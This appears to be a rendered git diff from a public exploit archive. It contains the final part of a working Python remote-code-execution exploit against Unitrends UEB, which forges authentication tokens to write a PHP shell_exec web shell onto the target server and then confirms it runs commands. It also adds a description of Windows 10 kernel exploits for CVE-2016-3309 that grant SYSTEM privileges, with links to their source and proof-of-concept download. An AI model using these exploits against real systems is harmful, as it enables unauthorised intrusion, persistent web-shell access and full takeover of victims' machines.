################################################################
|
||||
# BUILD THE AUTH TOKENS THAT WE'LL USE IN AN ATTACK.
|
||||
################################################################
|
||||
|
||||
parsed_json = json.loads(r1.read())
|
||||
|
||||
if 'auth_token' not in parsed_json:
|
||||
print "[!] Didn't receive an auth token. Bad creds?"
|
||||
exit()
|
||||
|
||||
auth_encoded = parsed_json['auth_token']
|
||||
auth_decoded = base64.b64decode(auth_encoded)
|
||||
|
||||
uuid = auth_decoded.split(':')[1]
|
||||
ssid = auth_decoded.split(':')[2]
|
||||
|
||||
# We'll place our command shell in /var/www/html/tempPDF, since apache
|
||||
# has rw in this dir.
|
||||
|
||||
log_dir = "/var/www/html/tempPDF/"
|
||||
log_file = ''.join(random.choice(string.ascii_lowercase) for _ in range(5)) + '.php'
|
||||
log_lvl = "5"
|
||||
shell = "<?php echo shell_exec($_GET['cmd']);?> >"
|
||||
|
||||
auth_mod1 = "v0:{0}:{1}:{2}{3}:{4}".format(uuid, ssid, log_dir, log_file, log_lvl)
|
||||
auth_mod2 = "v0:{0}:{1}:{2}{3}:{4}".format(shell, ssid, log_dir, log_file, log_lvl)
|
||||
|
||||
auth_mod1 = base64.b64encode(auth_mod1)
|
||||
auth_mod2 = base64.b64encode(auth_mod2)
|
||||
|
||||
url2 = '/api/summary/current/'
|
||||
|
||||
################################################################
|
||||
# REQUEST 2: PUT A FILE
|
||||
################################################################
|
||||
|
||||
print "[+] Making a request to place log to http://{0}/tempPDF/{1}".format(RHOST, log_file)
|
||||
|
||||
headers2 = {'Host' : RHOST,
|
||||
'AuthToken' : auth_mod1}
|
||||
|
||||
# touch the file
|
||||
conn.request("GET", url2, headers=headers2)
|
||||
r2 = conn.getresponse()
|
||||
|
||||
print "[+] Making request to reflect shell_exec php to {0}.".format(log_file)
|
||||
|
||||
headers3 = {'Host' : RHOST,
|
||||
'AuthToken' : auth_mod2}
|
||||
|
||||
# make the first command
|
||||
time.sleep(.5)
|
||||
conn.request("GET", url2, headers=headers3)
|
||||
conn.close()
|
||||
|
||||
# optional cleanup time
|
||||
|
||||
print "[+] Making a request to generate clean shell_exec at http://{0}/tempPDF/shell.php".format(RHOST)
|
||||
|
||||
url4 = '/tempPDF/' + log_file
|
||||
url4 += '?cmd=echo+-e+"<?php%20echo%20shell_exec(\$_GET[%27cmd%27]);?>"+>+shell.php'
|
||||
|
||||
conn1 = httplib.HTTPSConnection(RHOST, 443)
|
||||
conn1.request("GET", url4, headers=headers2)
|
||||
r3 = conn1.getresponse()
|
||||
conn1.close()
|
||||
|
||||
|
||||
url5 = "/tempPDF/shell.php"
|
||||
print "[+] Checking for presence of http://{0}{1}".format(RHOST, url5)
|
||||
headers3 = {'Host' : RHOST}
|
||||
|
||||
conn2 = httplib.HTTPSConnection(RHOST, 443)
|
||||
conn2.request("GET", url5, headers=headers2)
|
||||
r3 = conn2.getresponse()
|
||||
|
||||
if r3.status == 200:
|
||||
print "[+] Got a 200 back. We did it."
|
||||
print "[+] Example cmd: http://{0}{1}?cmd=id".format(RHOST, url5)
|
||||
else:
|
||||
print "Got a {0} back. Maybe this didn't work.".format(r3.status)
|
||||
print "Try RCE here http://{0}/tempPDF/{1}?cmd=id".format(RHOST, log_file)
|
||||
|
||||
conn2.close()
|
||||
|
||||
# 3. Solution:
|
||||
# Update to Unitrends UEB 10
|
17
platforms/win_x86-64/local/42960.txt
Executable file
17
platforms/win_x86-64/local/42960.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
Sources:
|
||||
https://siberas.de/blog/2017/10/05/exploitation_case_study_wild_pool_overflow_CVE-2016-3309_reloaded.html
|
||||
https://github.com/siberas/CVE-2016-3309_Reloaded
|
||||
|
||||
Exploits for the recently-patched win32kfull!bFill vulnerability. Executing the Palette or Bitmap exploit will give you SYSTEM privileges on the affected system. The exploits should work fine on Windows 10 x64 with Creators Update, build 15063.540 (latest version of Win10 before the release of Microsoft's September Updates).
|
||||
|
||||
The Visual Studio solution contains three exploits:
|
||||
|
||||
CVE-2016-3309_Reloaded_Bitmaps: Exploit using the Bitmaps technique
|
||||
CVE-2016-3309_Reloaded_Palettes: Exploit using the Palettes technique
|
||||
CVE-2016-3309_Reloaded_Deadlock: POC exploit showcasing the system deadlock which happens due to improved Handle validation
|
||||
|
||||
We also published a blog post (https://siberas.de/blog/2017/10/05/exploitation_case_study_wild_pool_overflow_CVE-2016-3309_reloaded.html) which goes into detail about the exploitation of this "wild" Pool-based overflow.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42960.zip
|
Loading…
Add table
Reference in a new issue